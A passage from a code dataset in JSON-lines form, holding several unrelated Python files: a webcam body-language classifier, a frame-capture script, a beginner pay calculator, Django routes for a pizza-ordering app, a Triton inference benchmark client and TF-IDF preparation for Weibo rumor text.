True\n\n def stream(self):\n\n def streaming():\n\n self.ret = True\n while self.ret:\n self.ret, np_image = self.cam.read()\n if np_image is None:\n continue\n if self.mirror:\n\n np_image = cv2.flip(np_image, 1)\n if self.touched_zoom:\n np_image = self.__zoom(np_image, (self.center_x, self.center_y))\n else:\n if not self.scale == 1:\n np_image = self.__zoom(np_image)\n self.data = np_image\n k = cv2.waitKey(1)\n if k == ord('q'):\n self.release()\n break\n\n Thread(target=streaming).start()\n\n def __zoom(self, img, center=None):\n\n height, width = img.shape[:2]\n if center is None:\n\n center_x = int(width / 2)\n center_y = int(height / 2)\n radius_x, radius_y = int(width / 2), int(height / 2)\n else:\n\n rate = height / width\n center_x, center_y = center\n\n\n if center_x < width * (1-rate):\n center_x = width * (1-rate)\n elif center_x > width * rate:\n center_x = width * rate\n if center_y < height * (1-rate):\n center_y = height * (1-rate)\n elif center_y > height * rate:\n center_y = height * rate\n\n center_x, center_y = int(center_x), int(center_y)\n left_x, right_x = center_x, int(width - center_x)\n up_y, down_y = int(height - center_y), center_y\n radius_x = min(left_x, right_x)\n radius_y = min(up_y, down_y)\n\n\n radius_x, radius_y = int(self.scale * radius_x), int(self.scale * radius_y)\n\n\n min_x, max_x = center_x - radius_x, center_x + radius_x\n min_y, max_y = center_y - radius_y, center_y + radius_y\n\n\n cropped = img[min_y:max_y, min_x:max_x]\n\n new_cropped = cv2.resize(cropped, (width, height))\n\n return new_cropped\n\n def zoom_out(self):\n # scale 값을 조정하여 zoom-out\n if self.scale < 1:\n self.scale += 0.4\n if self.scale == 1:\n self.center_x = self.WIDTH\n self.center_y = self.HEIGHT\n self.touched_zoom = False\n\n def zoom_in(self):\n\n if self.scale > 0.2:\n self.scale -= 0.4\n def save_picture(self):\n\n ret, img = self.cam.read()\n if ret:\n now = datetime.datetime.now()\n date = now.strftime('%Y%m%d')\n hour = now.strftime('%H%M%S')\n user_id = '00001'\n filename = './images/cvui_{}_{}_{}.png'.format(date, hour, user_id)\n cv2.imwrite(filename, img)\n self.image_queue.put_nowait(filename)\n\n def show(self):\n with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\n while self.cam.isOpened():\n self.ret,frame = self.cam.read()\n frame = self.data\n \n # Recolor Feed\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False \n\n # Make Detections\n results = holistic.process(image)\n image.flags.writeable = True \n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n # 1. Draw face landmarks\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_TESSELATION, \n mp_drawing.DrawingSpec(color=(80,110,10), thickness=1, circle_radius=1),\n mp_drawing.DrawingSpec(color=(80,256,121), thickness=1, circle_radius=1)\n )\n\n # 2. Right hand\n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(80,22,10), thickness=2, circle_radius=4),\n mp_drawing.DrawingSpec(color=(80,44,121), thickness=2, circle_radius=2)\n )\n\n # 3. Left Hand\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(121,22,76), thickness=2, circle_radius=4),\n mp_drawing.DrawingSpec(color=(121,44,250), thickness=2, circle_radius=2)\n )\n\n # 4. Pose Detections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(245,117,66), thickness=2, circle_radius=4),\n mp_drawing.DrawingSpec(color=(245,66,230), thickness=2, circle_radius=2)\n )\n # Export coordinates\n try:\n # Extract Pose landmarks\n pose = results.pose_landmarks.landmark\n pose_row = list(np.array([[landmark.x, landmark.y, landmark.z, landmark.visibility] for landmark in pose]).flatten())\n\n # Extract Face landmarks\n face = results.face_landmarks.landmark\n face_row = list(np.array([[landmark.x, landmark.y, landmark.z, landmark.visibility] for landmark in face]).flatten())\n\n # Concate rows\n row = pose_row+face_row\n\n\n # Make Detections\n X = pd.DataFrame([row])\n body_language_class = model.predict(X)[0]\n body_language_prob = model.predict_proba(X)[0]\n body_language_class_list = body_language_class.split() \n print(body_language_class, body_language_prob)\n\n # Grab ear coords\n coords = tuple(np.multiply(\n np.array(\n (results.pose_landmarks.landmark[mp_holistic.PoseLandmark.LEFT_EAR].x, \n results.pose_landmarks.landmark[mp_holistic.PoseLandmark.LEFT_EAR].y))\n , [640,480]).astype(int))\n\n cv2.rectangle(image, \n (coords[0], coords[1]+5), \n (coords[0]+len(body_language_class)*20, coords[1]-30), \n (245, 117, 16), -1)\n cv2.putText(image, body_language_class, coords, \n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n # Get status box\n cv2.rectangle(image, (0,0), (250, 60), (245, 117, 16), -1)\n\n # Display Class\n cv2.putText(image, 'CLASS'\n , (95,12), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1, cv2.LINE_AA)\n cv2.putText(image, body_language_class.split(' ')[0]\n , (90,40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n # Display Probability\n cv2.putText(image, 'PROB'\n , (15,12), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1, cv2.LINE_AA)\n cv2.putText(image, str(round(body_language_prob[np.argmax(body_language_prob)],2))\n , (10,40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n # Save Results to CSV\n body_language_class_list.insert(0,user)\n with open ('rs.csv', mode = 'a', newline='') as f:\n csv_writer=csv.writer(f, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow(body_language_class_list)\n\n except:\n pass\n \n if frame is not None:\n cv2.imshow('Capture', image)\n if body_language_class == 'Khochiu':\n ret, img = self.cam.read()\n if ret:\n now = datetime.datetime.now()\n date = now.strftime('%Y%m%d')\n hour = now.strftime('%H%M%S')\n user_id = '00001'\n filename = './images/cvui_{}_{}_{}.png'.format(date, hour, user_id)\n cv2.imwrite(filename, img)\n self.image_queue.put_nowait(filename)\n print('took photo')\n key = cv2.waitKey(1)\n if key == ord('q'):\n # q : close\n self.release()\n cv2.destroyAllWindows()\n break\n\n elif key == ord('z'):\n # z : zoom - in\n self.zoom_in()\n\n elif key == ord('x'):\n # x : zoom - out\n self.zoom_out()\n \n \n \n def release(self):\n self.cam.release()\n cv2.destroyAllWindows()\n\ncam=Camera(mirror=True)\ncam.stream()\ncam.show()","repo_name":"NorG0/MyProject2","sub_path":"Final_Model.py","file_name":"Final_Model.py","file_ext":"py","file_size_in_byte":10852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27401013475","text":"import os\nimport sys\nimport csv\nimport torch\nfrom torch import nn\nimport cv2\nimport argparse\nimport time\n\n\n# sys.path.append('../..')\n# sys.path.append(os.getcwd())\n\n\n# from Module.Data.Base_lmdb_entery import Image_entery\n# from Module.Data import iframe_720x1280_dataset\nparser = argparse.ArgumentParser(prog=os.path.basename(__file__), description=\"read the saving path and frame rate and resolution\")\n\nparser.add_argument('--save_path', type=str, required=True)\nparser.add_argument('--fps', type=int, required=True, default=30)\nparser.add_argument('--width', type=int, default=640)\nparser.add_argument('--height', type=int, default=480)\n\nargs = parser.parse_args()\n\n\nif __name__ == '__main__':\n print(42)\n # new_db_path = '/home/hasadi/project/cameranoiseprint/data'\n # new_db_name = 'vision_720x1280'\n # new_db = os.path.join(new_db_path, new_db_name)\n\n # dataset = iframe_720x1280_dataset.VideoData(db_path=new_db_path, db_name=new_db_name, crop_size=(510, 510), fup=3)\n \n # print(len(dataset))\n \"\"\"\n camera final resolution \n 1280.0 960.0\n \"\"\"\n\n saving_path = os.path.join(os.getcwd(), args.save_path)\n txt_path = os.path.dirname(saving_path)\n if not os.path.exists(saving_path):\n os.makedirs(saving_path)\n\n cam = cv2.VideoCapture(0)\n\n cam.set(cv2.CAP_PROP_FPS, args.fps)\n cam.set(cv2.CAP_PROP_FRAME_WIDTH, args.width)\n cam.set(cv2.CAP_PROP_FRAME_HEIGHT, args.height)\n\n if not cam.isOpened():\n print(\"cam is not open\")\n else:\n # cam.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n # cam.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n frame_id = 0\n with open(os.path.join(txt_path, 'timestame.txt'), 'w') as f:\n with open(os.path.join(txt_path, 'data.csv'), 'w', newline='\\n') as f_data:\n writer = csv.writer(f_data)\n while(True):\n # Capture frame-by-frame\n ret, frame = cam.read()\n time_stamp = time.time_ns()\n f.write(f'{time_stamp}\\n')\n writer.writerow([time_stamp, f'{time_stamp}.png'])\n # Display the resulting frame\n cv2.imshow('preview',frame)\n cv2.imwrite(os.path.join(saving_path, f'{time_stamp}.png'), frame)\n\n # Waits for a user input to quit the application\n # frame_id += 1\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break","repo_name":"hamzeasadi/cameranoiseprint","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36825805076","text":"sh = input('Enter Hours: ')\nsr = input('Enter Rate: ')\ntry:\n fh = float(sh)\n fr = float(sr)\nexcept:\n print('Error, please enter numeric input')\n\nquit()\n#print(fh, fr)\nif fh > 40:\n regular = fh * fr\n otp = (fh - 40) * (fr * 0.5)\n xp = regular + otp\nelse :\n xp = fh * fr\nprint('Pay:',xp)","repo_name":"colloso999/Python","sub_path":"Chapter3_ConditionalExecution/Ex_03_02/Ex_03_02.py","file_name":"Ex_03_02.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72096467308","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom .views import home , adminloginview, adminhomepage, adminauthenticateview, adminlogout, addpizza, deletepizza, homepageview, signupuser, userloginview, customerpage, userauthenticate, userlogout,placeorder, myorders, adminorders,acceptorder,declineorder\n\n\nurlpatterns = [\n#-----Admin URLS -------#\n\tpath('admin/', adminloginview, name= 'adminloginview'),\n\tpath('adminauthenticateview', adminauthenticateview, name= 'adminauthenticateview'),\n\tpath('admin/homepage/', adminhomepage, name= 'adminhomepage'),\n\tpath('adminlogout/', adminlogout, name='adminlogout'),\n\tpath('addpizza/', addpizza, name='addpizza'),\n\tpath('deletepizza//', deletepizza, name='deletepizza'),\n\tpath('adminorders/', adminorders, name= 'adminorders'),\n\tpath('acceptorder//', acceptorder, name='acceptorder'),\n\tpath('declineorder//', declineorder, name='declineorder'),\n#---------Customer URLS------------#\n\tpath('', homepageview, name='homepageview'),\n\tpath('signupuser/', signupuser, name=\"signupuser\"),\n\tpath('loginuser/', userloginview, name = 'userloginview'),\n\tpath('userauthenticate/', userauthenticate, name= 'userauthenticate'),\n\tpath('customer/welcome/', customerpage, name= 'customerpage'),\n\tpath('userlogout/', userlogout, name='userlogout'),\n\tpath('placeorder/', placeorder, name = 'placeorder'),\n\tpath('myorders/', myorders, name= 'myorders'),\n\t]","repo_name":"gunarevuri/Pizza-ordering-Django","sub_path":"pizzaapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71584826346","text":"# -*- coding: utf-8 -*-\nimport sys\n\nsys.path.append(\"/\")\n\nfrom app.shared.models import db\nfrom app.models.brand import Brand\nfrom app.models.discount_code import DiscountCode\nfrom app.models.user import User\nfrom app.manage import app\n\n\ndef seed():\n a = User(name=\"user\", surname=\"test\", email=\"a@a.com\")\n a.save()\n brand = Brand(name=\"papple\")\n brand.save()\n code = DiscountCode(code=\"m1macio\", brand_id=brand.id)\n code.save()\n\n\ndef truncate_all():\n models = [DiscountCode, Brand, User]\n for model in models:\n db.session.query(model).delete()\n db.session.commit()\n\n\nif __name__ == \"__main__\":\n with app.app_context():\n truncate_all()\n seed()\n","repo_name":"ByK95/discount_code","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"424816380","text":"from django.conf.urls import patterns, url\n\nfrom portfolio.views import (ArtifactDetail, ArtifactList, ProjectDetail,\n ProjectList, CategoryDetail, CategoryList)\n\nurlpatterns = patterns(\n '',\n url(r'^(?P[-\\w]+)/projects/(?P[-\\w]+)/pages/'\n '(?P[-\\w]+)/$', ArtifactDetail.as_view(),\n name='artifact_detail'),\n url(r'^(?P[-\\w]+)/projects/(?P[-\\w]+)/'\n 'pages/$', ArtifactList.as_view(), name='artifact_list'),\n url(r'^(?P[-\\w]+)/projects/(?P[-\\w]+)/$',\n ProjectDetail.as_view(), name='project_detail'),\n url(r'^(?P[-\\w]+)/projects/$', ProjectList.as_view(),\n name='project_list'),\n url(r'^(?P[-\\w]+)/$', CategoryDetail.as_view(),\n name='category_detail'),\n url(r'^$', CategoryList.as_view(),\n name='category_list'),\n\n)\n","repo_name":"raymcbride/django-portfolio","sub_path":"portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25173168838","text":"import argparse\nimport logging\nimport time\nimport typing\n\nimport numpy as np\nimport tritonclient.grpc as triton\nfrom stillwater import (\n DummyDataGenerator,\n MultiSourceGenerator,\n ThreadedMultiStreamInferenceClient\n)\nfrom stillwater.utils import ExceptionWrapper\nfrom stillwater.client.monitor import ClientStatsMonitor\n\n\ndef main(\n url: str,\n model_name: str,\n model_version: int,\n num_clients: int,\n sequence_id: int,\n generation_rate: float,\n num_iterations: int = 10000,\n warm_up: typing.Optional[int] = None,\n filename: typing.Optional[str] = None\n):\n client = ThreadedMultiStreamInferenceClient(\n url=url,\n model_name=model_name,\n model_version=model_version,\n qps_limit=generation_rate,\n name=\"client\"\n )\n\n output_pipes = {}\n for i in range(num_clients):\n seq_id = sequence_id + i\n\n sources = []\n for state_name, shape in client.states.items():\n sources.append(DummyDataGenerator(\n shape=shape,\n name=state_name,\n ))\n source = MultiSourceGenerator(sources)\n pipe = client.add_data_source(source, str(seq_id), seq_id)\n output_pipes[seq_id] = pipe\n\n warm_up_client = triton.InferenceServerClient(url)\n warm_up_inputs = []\n for input in client.model_metadata.inputs:\n x = triton.InferInput(input.name, input.shape, input.datatype)\n x.set_data_from_numpy(np.random.randn(*input.shape).astype(\"float32\"))\n warm_up_inputs.append(x)\n\n for i in range(warm_up):\n warm_up_client.infer(model_name, warm_up_inputs, str(model_version))\n\n logging.info(\n f\"Gathering performance metrics over {num_iterations} iterations\"\n )\n\n num_packages_received = 0\n bars = \"|\" + \" \" * 25 + \"|\"\n max_msg = f\" {num_iterations}/{num_iterations}\"\n max_len = len(bars) + len(max_msg)\n\n client.start()\n try:\n while True:\n for seq_id, pipe in output_pipes.items():\n if not pipe.poll():\n continue\n x = pipe.recv()\n if isinstance(x, ExceptionWrapper):\n x.reraise()\n num_packages_received += 1\n if num_packages_received >= num_iterations:\n break\n\n num_equal_signs = num_packages_received * 25 // num_iterations\n num_spaces = 25 - num_equal_signs\n msg = \"|\" + \"=\" * num_equal_signs + \" \" * num_spaces + \"|\"\n msg += f\" {num_packages_received}/{num_iterations}\"\n num_spaces = \" \" * (max_len - len(msg))\n print(msg + num_spaces, end=\"\\r\", flush=True)\n finally:\n client.stop()\n client.join(1)\n try:\n client.close()\n except ValueError:\n client.terminate()\n time.sleep(0.1)\n client.close()\n logging.warning(\"Client closed ungracefully\")\n\n if filename is None:\n return\n\n # this is lazy since it's really just going\n # from one queue to another but it's less code\n # to write so whatever\n monitor = ClientStatsMonitor(client, filename)\n monitor.start()\n while not client._metric_q.empty():\n time.sleep(0.1)\n monitor.stop()\n monitor.join(0.1)\n monitor.close()\n return monitor.output_file\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n client_parser = parser.add_argument_group(\n title=\"Client\",\n description=(\n \"Arguments for instantiation the Triton \"\n \"client instance\"\n )\n )\n client_parser.add_argument(\n \"--url\",\n type=str,\n default=\"localhost:8001\",\n help=\"Server URL\"\n )\n client_parser.add_argument(\n \"--model-name\",\n type=str,\n default=\"gwe2e\",\n help=\"Name of model to send requests to\"\n )\n client_parser.add_argument(\n \"--model-version\",\n type=int,\n default=1,\n help=\"Model version to send requests to\"\n )\n client_parser.add_argument(\n \"--sequence-id\",\n type=int,\n default=1001,\n help=\"Sequence identifier to use for the client stream\"\n )\n\n data_parser = parser.add_argument_group(\n title=\"Data\",\n description=\"Arguments for instantiating the client data sources\"\n )\n data_parser.add_argument(\n \"--generation-rate\",\n type=float,\n required=True,\n help=\"Rate at which to generate data\"\n )\n\n runtime_parser = parser.add_argument_group(\n title=\"Run Options\",\n description=\"Arguments parameterizing client run\"\n )\n runtime_parser.add_argument(\n \"--num-iterations\",\n type=int,\n default=10000,\n help=\"Number of requests to get for profiling\"\n )\n runtime_parser.add_argument(\n \"--num-clients\",\n type=int,\n default=1,\n help=\"Number of clients to run simultaneously\"\n )\n runtime_parser.add_argument(\n \"--warm-up\",\n type=int,\n default=None,\n help=\"Number of warm up requests to make\"\n )\n runtime_parser.add_argument(\n \"--file-prefix\",\n type=str,\n default=None,\n help=\"Prefix to attach to monitor files\"\n )\n runtime_parser.add_argument(\n \"--queue-threshold-us\",\n type=float,\n default=100000,\n help=\"Maximum allowable queuing time in microseconds\"\n )\n runtime_parser.add_argument(\n \"--latency-threshold\",\n type=float,\n default=1.,\n help=\"Maximum allowable end-to-end latency in seconds\"\n )\n runtime_parser.add_argument(\n \"--log-file\",\n type=str,\n default=None,\n help=\"Optional log file to write to\"\n )\n flags = vars(parser.parse_args())\n\n log_file = flags.pop(\"log_file\")\n if log_file is not None:\n logging.basicConfig(filename=log_file, level=logging.INFO)\n else:\n import sys\n logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\n try:\n main(**flags)\n except Exception:\n logging.exception(\"Fatal error\")\n raise\n","repo_name":"alecgunny/benchmark-ligo-py","sub_path":"expts/offline/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27186128046","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nmokh_db = pd.read_csv('all_data/tables/mokh.csv', index_col=0)\n\nstatistics = {'None': 0}\n\n\n\nfor index, row in mokh_db.iterrows():\n print(index, row['gene'])\n if type(row['gene']) == float:\n statistics['None'] += 1\n elif row['gene'] == 'None':\n statistics['None'] += 1\n else:\n biotype = row['gene'].split(',')[1].split(':')[1]\n print(biotype)\n\n if biotype in statistics.keys():\n statistics[str(biotype)] += 1\n else:\n statistics[biotype] = 1\n print(statistics)\n print('\\n')\n \nsizes = list(statistics.values())\n\nlabels = list(statistics.keys())\nlabels2 = []\n\nfor i in labels:\n labels2.append(str(i) + ': ' + str(statistics[i]))\n \n \n \nfig, ax = plt.subplots(figsize=(24, 12), subplot_kw=dict(aspect=\"equal\"))\n\nwedges, texts = ax.pie(sizes, wedgeprops=dict(width=0.5), startangle=-40)\n\nbbox_props = dict(boxstyle=\"round,pad=0.3\", fc=\"w\", ec=\"k\", lw=0.9)\nkw = dict(arrowprops=dict(arrowstyle=\"-\"),\n bbox=bbox_props, zorder=0, va=\"center\", size=15)\n\nfor i, p in enumerate(wedges):\n ang = (p.theta2 - p.theta1)/2. + p.theta1\n y = np.sin(np.deg2rad(ang))\n x = np.cos(np.deg2rad(ang))\n horizontalalignment = {-1: \"right\", 1: \"left\"}[int(np.sign(x))]\n connectionstyle = \"angle,angleA=0,angleB={}\".format(ang)\n kw[\"arrowprops\"].update({\"connectionstyle\": connectionstyle})\n ax.annotate(labels2[i], xy=(x, y), xytext=(1.35*np.sign(x), 1.4*y),\n horizontalalignment=horizontalalignment, **kw)\n\nax.set_title(\"Eudicots-monocots dataset: functional annotation of Physcomitrella patens clusters\", size=25)\n\nplt.show()\nplt.savefig('statistics.png')","repo_name":"MarySelifanova/PlantLIMEs","sub_path":"scripts/spatial_annotation_pipeline/visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32186146787","text":"class view_config(object):\n venusian = venusian\n def __init__(self, **settings):\n if 'for_' in settings:\n if settings.get('context') is None:\n settings['context'] = settings['for_']\n self.__dict__.update(settings)\n\n def __call__(self, wrapped):\n settings = self.__dict__.copy()\n depth = settings.pop('_depth', 0)\n\n def callback(context, name, ob):\n config = context.config.with_package(info.module)\n config.add_view(view=ob, **settings)\n\n info = self.venusian.attach(wrapped, callback, category='pyramid',\n depth=depth + 1)\n\n if info.scope == 'class':\n if settings.get('attr') is None:\n settings['attr'] = wrapped.__name__\n\n settings['_info'] = info.codeinfo\n return wrapped\n","repo_name":"poros/talk-write-more-decorators-and-fewer-classes","sub_path":"intro/pyramid_internals.py","file_name":"pyramid_internals.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"9850172878","text":"import pygame\r\nimport board\r\nimport rules\r\n\r\nSCREEN_WIDTH = 100\r\nSCREEN_HEIGHT = 100\r\nTILE_SIZE = 1\r\nGAME_TICK = 20\r\nGAME_RULE = rules.CONWAY\r\nSEED_FRAC = 2\r\n\r\ndef render():\r\n screen.fill(0)\r\n state = gameBoard.board\r\n pixels = pygame.PixelArray(screen)\r\n for row in range(SCREEN_HEIGHT):\r\n for col in range(SCREEN_WIDTH):\r\n boardPos = gameBoard.asBoardPos((col, row))\r\n pixels[col, row] = int(state[boardPos]) * 0xAAAAAA\r\n pixels.close()\r\n\r\npygame.init()\r\nclock = pygame.time.Clock()\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), flags=pygame.SCALED)\r\nrunning = True\r\npaused = True\r\nclicking = False\r\ngameBoard = board.Board(SCREEN_WIDTH, SCREEN_HEIGHT, TILE_SIZE, GAME_RULE, SEED_FRAC)\r\n\r\nrender()\r\npygame.display.flip()\r\n\r\nwhile running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_SPACE:\r\n paused = True if paused == False else False\r\n if event.key == pygame.K_RETURN:\r\n gameBoard.initialize()\r\n if event.key == pygame.K_BACKSPACE:\r\n gameBoard.clear()\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n clicking = True\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n clicking = False\r\n gameBoard.clearMouseHistory()\r\n \r\n if clicking:\r\n gameBoard.handleMouse(pygame.mouse.get_pos())\r\n render()\r\n \r\n clock.tick(GAME_TICK)\r\n if paused == False:\r\n gameBoard.update()\r\n render()\r\n\r\n pygame.display.flip()\r\n \r\npygame.quit()","repo_name":"kalmizyed/pygame-of-life","sub_path":"conway.py","file_name":"conway.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42837298560","text":"import argparse\nimport sys\nimport seqlib\n\nparser = argparse.ArgumentParser(description='read in a fasta file')\nparser.add_argument('--fasta', required=True, type=str)\narg = parser.parse_args()\n\n# prints the name of the file used as an argument input\nprint(arg.fasta)\n\n# in what other ways can i read the output of read_fasta()?\nprint('##### Total size ##########################')\ntotal_size = 0\nnum_contigs = 0\nlengths = []\nfor name, seq in seqlib.read_fasta(arg.fasta):\n\ttotal_size += len(seq)\n\tnum_contigs += 1\n\tlengths.append(len(seq))\nprint(total_size)\n\nprint('##### Number of contigs ###################')\nprint(num_contigs)\n\nprint('##### Shortest and longest contigs ########')\nlengths = sorted(lengths, reverse=True)\nprint('longest:', lengths[0])\nprint('shortest:', lengths[len(lengths) - 1])\n\nprint('##### Average and median contig sizes #####')\nprint('Avg:', sum(lengths)/len(lengths))\nif len(lengths)%2 == 0:\n\tprint('Med:', lengths[len(lengths)//2 - 1] + lengths[len(lengths)//2])\nelse:\n\tprint('Med:', lengths[(len(lengths) - 1)//2])\n\nprint('##### N50 #################################')\nhalf = sum(lengths)/2\nn = 0\ncontig = 0\nfor l in lengths:\n\tif n <= half:\n\t\tn += l\n\t\tcontig += 1\n\telse:\n\t\tprint(lengths[contig - 1])\n\t\tbreak\n\t\t\nprint('##### GC fraction #########################')\n# if i leave it as 'for seq in', it prints both the name and the seq\nind = []\nfor name, seq in seqlib.read_fasta(arg.fasta):\n\tfor p in range(len(seq)):\n\t\tind.append(seq[p])\n# same amount of nts here as in lengths\n# print(ind)\n# print(len(ind))\n\t\nGC = 0\nnotACTG = 0\nfor nt in ind:\n\tif nt == 'G' or nt == 'g' or nt == 'C' or nt == 'c':\n\t\tGC += 1\n\telif nt == 'A' or nt == 'a' or nt == 'T' or nt == 't':\n\t\tGC += 0\n\telse:\t\n\t\tnotACTG += 1\nprint(GC/(total_size - notACTG))\n\n\n# using count() is MUCH faster\n\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\t\n\n","repo_name":"icacedo/MCB198","sub_path":"genstats2.py","file_name":"genstats2.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72626587307","text":"# encoding:utf-8\n\nimport json\nimport jieba\nfrom sklearn.feature_extraction.text import TfidfTransformer, CountVectorizer\nfrom sklearn.externals import joblib\n\n\n# 谣言语料库\ndef gen_corpus_of_rumor():\n corpus = []\n with open('../weibo_rumor_analysis/file/rumor_weibo_updated.json', 'r') as src:\n lines = src.readlines()\n for line in lines:\n rumor_dict = json.loads(line)\n reported_weibo = rumor_dict['reportedWeibo']\n if isinstance(reported_weibo, dict):\n corpus.append(reported_weibo['weiboContent'])\n else:\n corpus.append('[Error] ' + str(reported_weibo))\n with open('file/corpus/corpus_of_rumor.txt', 'w') as out:\n for c in corpus:\n out.write('{}\\n'.format(c))\n\n\n# 真实微博语料库\ndef gen_corpus_of_truth():\n corpus = []\n with open('../weibo_truth_analysis/file/weibo_truth.txt', 'r') as src:\n lines = src.readlines()\n for index_e, line in enumerate(lines):\n event_dict = json.loads(line)\n weibos = event_dict['weibo']\n for index_w, weibo in enumerate(weibos):\n if 'content' in weibo.keys():\n content = weibo['content'].replace('\\t', '').replace('\\n', '').replace('\\r', '')\n corpus.append('({}, {}) : {}'.format(index_e, index_w, content))\n with open('file/corpus/corpus_of_truth.txt', 'w') as out:\n for c in corpus:\n out.write('{}\\n'.format(c))\n\n\n# 谣言语料库-分词\ndef cut_words_of_rumor():\n corpus = []\n with open('file/corpus/corpus_of_rumor.txt', 'r') as src:\n lines = src.readlines()\n for line in lines:\n seg_list = jieba.cut(line)\n result = ' '.join(seg_list)\n corpus.append(result)\n with open('file/corpus/cut_corpus_of_rumor.txt', 'w') as out:\n for c in corpus:\n out.write('{}'.format(c))\n\n\n# 真实微博语料库-分词\ndef cut_words_of_truth():\n corpus = []\n with open('file/corpus/corpus_of_truth.txt', 'r', encoding='utf-8') as src:\n lines = src.readlines()\n for line in lines:\n seg_list = jieba.cut(line)\n result = ' '.join(seg_list)\n corpus.append(result)\n with open('file/corpus/cut_corpus_of_truth.txt', 'w', encoding='utf-8') as out:\n for c in corpus:\n out.write('{}'.format(c))\n\n\n# 谣言语料库-得到tf-idf向量\ndef get_tf_idf_of_rumor(features_num=4000):\n corpus = []\n with open('file/corpus/cut_corpus_of_rumor.txt', 'r') as src:\n lines = src.readlines()\n for line in lines:\n corpus.append(line)\n print('The size of corpus is {}'.format(len(corpus)))\n\n vectorizer = CountVectorizer(max_features=features_num)\n transformer = TfidfTransformer()\n tf_idf = transformer.fit_transform(vectorizer.fit_transform(corpus))\n vocabulary = vectorizer.get_feature_names()\n\n joblib.dump((vocabulary, tf_idf), 'file/pkl/tf_idf_of_rumor_{}.pkl'.format(features_num))\n\n\n# 真实语料库-得到tf-idf向量\ndef get_tf_idf_of_truth(features_num=4000):\n corpus = []\n with open('file/corpus/cut_corpus_of_truth.txt', 'r', encoding='utf-8') as src:\n lines = src.readlines()\n for line in lines:\n corpus.append(line)\n print('The size of corpus is {}'.format(len(corpus)))\n\n vectorizer = CountVectorizer(max_features=features_num)\n transformer = TfidfTransformer()\n tf_idf = transformer.fit_transform(vectorizer.fit_transform(corpus))\n vocabulary = vectorizer.get_feature_names()\n\n joblib.dump((vocabulary, tf_idf), 'file/pkl/tf_idf_of_truth_{}.pkl'.format(features_num))\n\n# get_tf_idf_of_truth()\n","repo_name":"Ivan12138/RumorDataAnalysis","sub_path":"text_filtering/tf_idf_text_filtering_pre.py","file_name":"tf_idf_text_filtering_pre.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"23955099175","text":"import os\nimport csv\nimport sys\nimport numpy as np\nimport scipy.io as sio\nfrom sklearn import preprocessing\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n#from DataSet import Bucket\n\ntrain_path = 'C:\\\\Users\\\\WeiLong\\\\PycharmProjects\\\\01-16\\\\training2017\\\\training2017'\nsave_path = 